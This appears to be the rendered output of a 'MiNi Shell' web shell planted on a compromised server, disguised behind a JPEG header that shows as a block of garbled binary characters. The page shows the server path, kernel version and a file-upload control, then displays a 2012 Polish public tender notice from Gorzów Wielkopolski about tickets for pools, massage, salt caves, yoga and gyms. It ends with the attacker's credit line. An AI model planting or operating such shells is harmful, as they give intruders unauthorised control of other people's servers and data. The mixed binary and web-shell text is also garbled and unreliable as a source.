JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120614/201904-N-2012.html

<p class="kh_header"><b>Gorzów Wielkopolski: Aktywizacja zdrowotna przy wykorzystaniu instrumentów aktywnej integracji dla Beneficjentów Ostatecznych projektu Nowe umiejętności-nowe możliwości pochodzących z Powiatu Gorzowskiego</b><br>
<b>Numer ogłoszenia: 201904 - 2012; data zamieszczenia: 14.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Gorzowie Wlkp. , ul. Józefa Pankiewicza 5-7, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 0-95 7330-458, faks 0-95 7330-459.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiatgorzowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Aktywizacja zdrowotna przy wykorzystaniu instrumentów aktywnej integracji dla Beneficjentów Ostatecznych projektu Nowe umiejętności-nowe możliwości pochodzących z Powiatu Gorzowskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest aktywizacja zdrowotna przy wykorzystaniu instrumentów aktywnej integracji dla Beneficjentów Ostatecznych projektu Nowe umiejętności-nowe możliwości pochodzących z Powiatu Gorzowskiego.
Projekt Nowe umiejętności - nowe możliwości, w ramach którego realizowane będzie zadanie Aktywna integracja ma na celu zmniejszenie ryzyka wystąpienia lub redukcji istniejącego już zjawiska wykluczenia społecznego u osób korzystających z pomocy społecznej z terenu Powiatu Gorzowskiego w wieku 15 - 64 lat.

W ramach niniejszego zamówienia Wykonawca musi zapewnić dostawę biletów lub karnetów w następującym zakresie:

Część I  Dostawa biletów lub karnetów na zajęcia w basenie
Część II Dostawa biletów lub karnetów na masaż ręczny
Część III Dostawa biletów lub karnetów do groty solnej
Część IV Dostawa biletów lub karnetów na zajęcia yogi
Część V Dostawa biletów lub karnetów do siłowni

Szczegółowy opis przedmiotu zamówienia
Część I 
Dostawa biletów lub karnetów na zajęcia w basenie - dla 32 osób 
Każdy bilet lub karnet musi obejmować minimum 20 wejść na basen, z których każde musi trwać minimum 1 godzinę zegarową. Basen, na który zostaną dostarczone bilety lub karnety musi znajdować się na terenie miasta Gorzowa Wlkp. Obowiązkiem Wykonawcy jest zapewnienie, aby każdy bilet lub karnet posiadał ważność do 20 grudnia 2012 r. Dostarczone bilety lub karnety powinny umożliwić wejście na basen o dowolnej porze w czasie otwarcia obiektu. Wszystkie bilety lub karnety oraz inne dokumenty związane z realizacją zamówienia powinny być przygotowane przez Wykonawcę zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach programu operacyjnego Kapitał Ludzki. 


Część II 
Dostawa biletów lub karnetów na masaż ręczny - dla 8 osób 
Każdy bilet lub karnet musi obejmować minimum 6 masaży ręcznych, z których każdy musi trwać minimum 60 minut. Gabinet w którym będą wykonywane masaże, do którego zostaną dostarczone bilety lub karnety musi się znajdować na terenie miasta Gorzowa Wlkp. Obowiązkiem Wykonawcy jest zapewnienie aby każdy bilet lub karnet posiadał ważność do 20 grudnia 2012 r. Termin wykonania masażu zostanie uzgodniony indywidualnie z wykonawcą przez uczestnika. Wszystkie bilety lub karnety oraz inne dokumenty związane z realizacją zamówienia powinny być przygotowane przez Wykonawcę zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach programu operacyjnego Kapitał Ludzki.

Część III 
Dostawa biletów lub karnetów do groty solnej - dla 9 osób
Każdy bilet lub karnet musi obejmować minimum 20 wejść do groty solnej, z których każde musi trwać minimum 1 godzinę zegarową. Grota solna, na którą zostaną dostarczone bilety lub karnety musi znajdować się na terenie miasta Gorzowa Wlkp. Obowiązkiem Wykonawcy jest zapewnienie, aby każdy bilet lub karnet posiadał ważność do 20 grudnia 2012 r. Dostarczone bilety lub karnety powinny umożliwić wejście do groty solnej o dowolnej porze w czasie otwarcia obiektu. Wszystkie bilety lub karnety oraz inne dokumenty związane z realizacją zamówienia powinny być przygotowane przez Wykonawcę zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach programu operacyjnego Kapitał Ludzki. 

Część IV 
Dostawa biletów lub karnetów na zajęcia yogi - dla 1 osoby
Każdy bilet lub karnet musi obejmować minimum 20 wejść na zajęcia yogi, z których każde musi trwać minimum 1 godzinę zegarową. Miejsce zajęć yogi, na które zostaną dostarczone bilety lub karnety musi znajdować się na terenie miasta Gorzowa Wlkp. Obowiązkiem Wykonawcy jest zapewnienie, aby każdy bilet lub karnet posiadał ważność do 20 grudnia 2012 r. Dostarczone bilety lub karnety powinny umożliwić wejście na zajęcia o dowolnej porze w czasie organizacji tych zajęć. Wszystkie bilety lub karnety oraz inne dokumenty związane z realizacją zamówienia powinny być przygotowane przez Wykonawcę zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach programu operacyjnego Kapitał Ludzki. 

Część V 
Dostawa biletów lub karnetów do siłowni - dla 8 osób
Każdy bilet lub karnet musi obejmować minimum 20 wejść do siłowni, z których każde musi trwać minimum 1 godzinę zegarową. Siłownia, na którą zostaną dostarczone bilety lub karnety musi znajdować się na terenie miasta Gorzowa Wlkp. Obowiązkiem Wykonawcy jest zapewnienie, aby każdy bilet lub karnet posiadał ważność do 20 grudnia 2012 r. Dostarczone bilety lub karnety powinny umożliwić wejście na siłownię o dowolnej porze w czasie otwarcia obiektu. Wszystkie bilety lub karnety oraz inne dokumenty związane z realizacją zamówienia powinny być przygotowane przez Wykonawcę zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach programu operacyjnego Kapitał Ludzki. 

Pozostałe zobowiązania i postanowienia:
1) Wykonawca zobowiązany jest do prowadzenia działań informacyjnych i promocyjnych kierowanych do uczestników poprzez umieszczenie obowiązujących logotypów na wszystkich dokumentach dotyczących projektu systemowego. Należy to zrobić stosując odpowiednie logotypy oraz informację: Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Zamawiający udostępni Wykonawcy wzory obowiązujących logotypów, a Wykonawca we własnym zakresie zapewni wydruk ww oznaczeń, 
2) Wykonawca zobowiązany jest do przechowywania dokumentacji związanej z realizacją projektu systemowego do dnia 31.12.2020 r. w sposób zapewniający dostępność, poufność, bezpieczeństwo oraz do informowania Zamawiającego o miejscu archiwizacji dokumentów związanych z realizacją niniejszego zamówienia. W przypadku zmiany adresu archiwizacji dokumentów, zawieszenia lub zaprzestania przez Wykonawcę działalności przed terminem 31.12.2020 r. Wykonawca powiadomi Zamawiającego o tym na piśmie,
3) Wykonawca zobowiązany jest do niezwłocznego informowania w formie telefonicznej oraz jednocześnie pisemnej Zamawiającego o problemach w realizacji dostawy będącej przedmiotem zamówienia,
4) Wykonawca zobowiązany jest do poddania się kontroli dokonywanej przez Zamawiającego oraz inne uprawnione podmioty w zakresie prawidłowości realizacji dostawy będącej przedmiotem zamówienia,
5) Wykonawca zobowiązany jest do zapewnienia kontrolującym prawo wglądu we wszystkie dokumenty związane z realizacją Projektu systemowego, przez cały okres ich przechowywania, 
6) Udzielanie na pisemne wezwanie Zamawiającego wszelkich informacji i wyjaśnień związanych z realizacją zamówienia, w terminie określonym w wezwaniu przez cały okres realizacji zamówienia oraz okres, o którym mowa w pkt.2, 
7) Zamawiający ma prawo przeprowadzania czynności monitorujących podczas trwania dostawy, w szczególności do przeprowadzania ankiet, rozmów, konsultacji z uczestnikami, trenerami,  
8) Na podstawie art. 31 ust. 1 ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101, poz. 926, ze zm.), Zamawiający zleca Wykonawcy przetwarzanie danych osobowych w zakresie określonym przez Zamawiającego, 
9) Celem przetwarzania danych osobowych jest umożliwienie monitoringu, kontroli i ewaluacji Projektu systemowego, 
10) W zakresie, o którym mowa w pkt. 7 Wykonawca zobowiązuje się do współpracy z ewaluatorami zewnętrznymi, prowadzącymi badania na zlecenie Zamawiającego lub przez inne podmioty posiadające uprawnienia do przeprowadzenia tego typu badań,  
11) Ze strony Wykonawcy do przetwarzania danych dopuszczone mogą być jedynie osoby które uzyskały imienne upoważnienie zgodnie z art. 37 ustawy o ochronie danych osobowych, o której mowa pkt. 8, po podpisaniu oświadczenia o zachowaniu w tajemnicy danych osobowych, do których osoby te uzyskają dostęp w związku z wykonywaniem umowy. Imienne upoważnienia, o których mowa powyżej wydane będą przez Wykonawcę,
12) Wykonawca wyraża zgodę na upublicznienie swoich danych teleadresowych przez Zamawiającego oraz inne uprawnione do tego podmioty,
13) Wykonawca zobowiązany jest do stosowania aktualnych wytycznych w zakresie zasad przygotowania, realizacji rozliczania projektów systemowych powiatowych centrów pomocy rodzinie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.45.70.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany Formularz Oferty, stanowiący załącznik nr 1 do SIWZ,
2) Pełnomocnictwo, w przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy załączyć stosowne  dla osoby - osób podpisujących ofertę,
3) Jeżeli Wykonawca, wykazując spełnianie warunków o których mowa w art. 22 ust. 1 PZP polega na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy PZP, zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, sporządzone według załącznika nr 3a do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatgorzowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie ul. Józefa Pankiewicza 5-7, 66-400 Gorzów Wlkp. woj. lubuskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2012 godzina 12:00, miejsce: Powiatowe Centrum Pomocy Rodzinie ul. Józefa Pankiewicza 5-7, 66-400 Gorzów Wlkp., woj. lubuskie - sekretariat pok. 208.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pod nazwą Nowe umiejętności - nowe możliwości, w ramach którego realizowane jest zadanie Aktywna integracja, współfinansowany jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa biletów lub karnetów na zajęcia w basenie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa biletów lub karnetów na zajęcia w basenie - dla 32 osób 
Każdy bilet lub karnet musi obejmować minimum 20 wejść na basen, z których każde musi trwać minimum 1 godzinę zegarową. Basen, na który zostaną dostarczone bilety lub karnety musi znajdować się na terenie miasta Gorzowa Wlkp. Obowiązkiem Wykonawcy jest zapewnienie, aby każdy bilet lub karnet posiadał ważność do 20 grudnia 2012 r. Dostarczone bilety lub karnety powinny umożliwić wejście na basen o dowolnej porze w czasie otwarcia obiektu. Wszystkie bilety lub karnety oraz inne dokumenty związane z realizacją zamówienia powinny być przygotowane przez Wykonawcę zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach programu operacyjnego Kapitał Ludzki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.70.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa biletów lub karnetów na masaż ręczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa biletów lub karnetów na masaż ręczny - dla 8 osób 
Każdy bilet lub karnet musi obejmować minimum 6 masaży ręcznych, z których każdy musi trwać minimum 60 minut. Gabinet w którym będą wykonywane masaże, do którego zostaną dostarczone bilety lub karnety musi się znajdować na terenie miasta Gorzowa Wlkp. Obowiązkiem Wykonawcy jest zapewnienie aby każdy bilet lub karnet posiadał ważność do 20 grudnia 2012 r. Termin wykonania masażu zostanie uzgodniony indywidualnie z wykonawcą przez uczestnika. Wszystkie bilety lub karnety oraz inne dokumenty związane z realizacją zamówienia powinny być przygotowane przez Wykonawcę zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach programu operacyjnego Kapitał Ludzki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.70.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa biletów lub karnetów do groty solnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa biletów lub karnetów do groty solnej - dla 9 osób
Każdy bilet lub karnet musi obejmować minimum 20 wejść do groty solnej, z których każde musi trwać minimum 1 godzinę zegarową. Grota solna, na którą zostaną dostarczone bilety lub karnety musi znajdować się na terenie miasta Gorzowa Wlkp. Obowiązkiem Wykonawcy jest zapewnienie, aby każdy bilet lub karnet posiadał ważność do 20 grudnia 2012 r. Dostarczone bilety lub karnety powinny umożliwić wejście do groty solnej o dowolnej porze w czasie otwarcia obiektu. Wszystkie bilety lub karnety oraz inne dokumenty związane z realizacją zamówienia powinny być przygotowane przez Wykonawcę zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach programu operacyjnego Kapitał Ludzki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.70.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa biletów lub karnetów na zajęcia yogi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa biletów lub karnetów na zajęcia yogi - dla 1 osoby
Każdy bilet lub karnet musi obejmować minimum 20 wejść na zajęcia yogi, z których każde musi trwać minimum 1 godzinę zegarową. Miejsce zajęć yogi, na które zostaną dostarczone bilety lub karnety musi znajdować się na terenie miasta Gorzowa Wlkp. Obowiązkiem Wykonawcy jest zapewnienie, aby każdy bilet lub karnet posiadał ważność do 20 grudnia 2012 r. Dostarczone bilety lub karnety powinny umożliwić wejście na zajęcia o dowolnej porze w czasie organizacji tych zajęć. Wszystkie bilety lub karnety oraz inne dokumenty związane z realizacją zamówienia powinny być przygotowane przez Wykonawcę zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach programu operacyjnego Kapitał Ludzki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.70.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa biletów lub karnetów do siłowni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa biletów lub karnetów do siłowni - dla 8 osób
Każdy bilet lub karnet musi obejmować minimum 20 wejść do siłowni, z których każde musi trwać minimum 1 godzinę zegarową. Siłownia, na którą zostaną dostarczone bilety lub karnety musi znajdować się na terenie miasta Gorzowa Wlkp. Obowiązkiem Wykonawcy jest zapewnienie, aby każdy bilet lub karnet posiadał ważność do 20 grudnia 2012 r. Dostarczone bilety lub karnety powinny umożliwić wejście na siłownię o dowolnej porze w czasie otwarcia obiektu. Wszystkie bilety lub karnety oraz inne dokumenty związane z realizacją zamówienia powinny być przygotowane przez Wykonawcę zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach programu operacyjnego Kapitał Ludzki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.70.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com